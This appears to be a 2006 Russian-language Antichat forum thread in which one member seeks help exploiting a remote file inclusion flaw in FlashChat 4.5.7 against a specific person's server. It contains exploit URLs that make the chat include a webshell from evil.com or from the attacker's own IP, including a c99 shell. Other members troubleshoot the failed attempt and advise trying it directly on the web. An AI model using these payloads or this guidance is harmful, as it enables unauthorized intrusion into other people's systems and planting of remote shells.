HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
Перезагрузить страницу Flashchat !!!
   
 
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Flashchat !!!
  #1  
Старый 20.12.2006, 06:42
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию Flashchat !!!
Приветствую!!!

Вобщем есть такой вопросец хотел нагнуть FlashChat v 4.5.7 нашел баг под него на складе сайта www.milw0rm.com

Код:

http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt?

Видео данной уязвимости:

http://rapidshare.de/files/31362430/Flashchat.rar.html

------------------------------------------------------------------------------------------------

Ставлю я значит себе denwer кидаю туда вебшелл с99 и прописываю вот это:

http://ип_цель/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://ип_мой/c99.txt?


Идет запрос и шелл не хочет грузиться попробоал убрать [inc]

На это вебсерв отрыгивает такое:


Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(hdb.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Fatal error: main(): Failed opening required 'hdb.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13


Есть небольшой ньюанс на компе_цели как я понял стоит фаирвол который пропускает не все подряд а именно разрешенные приложения админом..
может быть в этом дело ?!

Т.е его ip даже не пингуется... а как я понял баг работает по принцыпу бэкконекта
и возможно фаир рубит это дело на корню..

Вобщем или я туплю или чтото не так делаю

Пролейте свет !!!!!!


Вопрос в догонку

Честно гворя я не совсем понимаю почему в етом баге шелл должен быть в виде .txt а не в .php

Не нужно ли мне случаем чтобы мой вебсерв обрабатывал .txt как скрипты php ?!
𝕏 Twitter Reddit Telegram Копировать ссылку
 

  #2  
Старый 20.12.2006, 14:29
morfey
Новичок
Регистрация: 14.12.2006
Сообщений: 26
С нами: 10213803

Репутация: 7
По умолчанию
ну вопервых денвер сначала надо настроить чтобы он смотрел в инет.

кидай в директорию c:/webservers/home/your_site/
файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться)

содержанием

# dnwr_ip 127.0.0.2 <-- вместо 127.0.0.2 вписывай свою ип при подключении к инету и делай ребут апача
# dnwr_host custom-host
# dnwr_port 80

Цитата:
Есть небольшой ньюанс на компе_цели как я понял стоит фаирвол который пропускает не все подряд а именно разрешенные приложения админом..
может быть в этом дело ?!
Файр не файр но он не должен блокировать запрос скрипта на инклуд.

Цитата:
Честно гворя я не совсем понимаю почему в етом баге шелл должен быть в виде .txt а не в .php

Не нужно ли мне случаем чтобы мой вебсерв обрабатывал .txt как скрипты php ?!
файл не должен обрабатываться на сервере где он лежит(иначе инклудиться будет результат выполнения команды на сервере-хранилище). чат инклудя твой тхт считывает его содержимое и помещает в страницу свою вот тама он и будет обрабатываться.
 

  #3  
Старый 20.12.2006, 21:53
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию
Вторым постом в теме всё описывается: http://forum.antichat.ru/thread20985.html.
Не знаю что там может быть непонятного. Пробуй сразу на вебе, не мучай себя и денвер. Кстати эту багу уже почти везде закрыли.
__________________
..
 

  #4  
Старый 21.12.2006, 12:50
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию
Цитата:
ну вопервых денвер сначала надо настроить чтобы он смотрел в инет. кидай в директорию c:/webservers/home/your_site/ файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться) содержанием # dnwr_ip 127.0.0.2 <-- вместо 127.0.0.2 вписывай свою ип при подключении к инету и делай ребут апача # dnwr_host custom-host # dnwr_port 80
Забыл дополнит что все это в местной сетке adsl в тырнет доступа нет...
Но сомо собой я настройил апатчь чтобы он смотрел в
сетку с портом 80 но все равно нехочет цеплять шелл.
Но настройку я делал не через .htaccess а прописал
в httpd.conf есть ли разница ?!

Цитата:
Кстати эту багу уже почти везде закрыли.
Ну может ее много где и закрыли но у етого перца весит именно ета версия и бновлять как я вижу он ее пока не собирается
Последний раз редактировалось karabym; 21.12.2006 в 13:01..
 

  #5  
Старый 21.12.2006, 12:59
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию
Цитата:
Вторым постом в теме всё описывается: http://forum.antichat.ru/thread20985.html.
Все кокраз так и делаю толко разница втом что шелл посется на моем вебсерваке..
 

  #6  
Старый 21.12.2006, 14:17
morfey
Новичок
Регистрация: 14.12.2006
Сообщений: 26
С нами: 10213803

Репутация: 7
По умолчанию
хм. такто разницы никакой. Но поробовать стоит. Этож денвер...
 

  #7  
Старый 21.12.2006, 14:22
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами: 10721066

Репутация: 4360


По умолчанию
Цитата:
файл ".htaccess"(с точкой. создать тебе врятли удасться а вот скопировать из custom получиться)
создать через експлорер нельзя, через командную строку - не вопрос
echo. > .htaccess
 

  #8  
Старый 21.12.2006, 14:30
morfey
Новичок
Регистрация: 14.12.2006
Сообщений: 26
С нами: 10213803

Репутация: 7
По умолчанию
))) Ай блин. сам тупанул. чет даж мысли не возникало...
 

  #9  
Старый 21.12.2006, 15:33
karabym
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
С нами: 10214517

Репутация: 44
По умолчанию
Пробовал .htaccess создавать неканает вобщем странно както
Возможно у него верссия подправленая хз

Хотя на запрос chat/inc/cmses/aedating4CMS.php выдает вот это

Warning: main(y:\home\non-existent-host/inc/header.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(): Failed opening 'y:\home\non-existent-host/inc/header.inc.php' for inclusion (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 12

Warning: main(db.inc.php): failed to open stream: No such file or directory in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13

Fatal error: main(): Failed opening required 'db.inc.php' (include_path='.;/usr/local/php/PEAR') in y:\home\non-existent-host\chat\inc\cmses\aedating4cms.php on line 13
 

  #10  
Старый 21.12.2006, 16:31
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами: 10692266

Репутация: 3486


По умолчанию
Пишет что нету такого файла или дирректории. Админ вполне мог их перенести, и изменить адреса подгружаемых файлов чата.
__________________
..
 
 
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
FlashChat v4.7.0 †Romi4† PHP 2 15.11.2006 01:19
FlashChat v4.7.0 ZikZak Болталка 3 14.11.2006 05:34



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.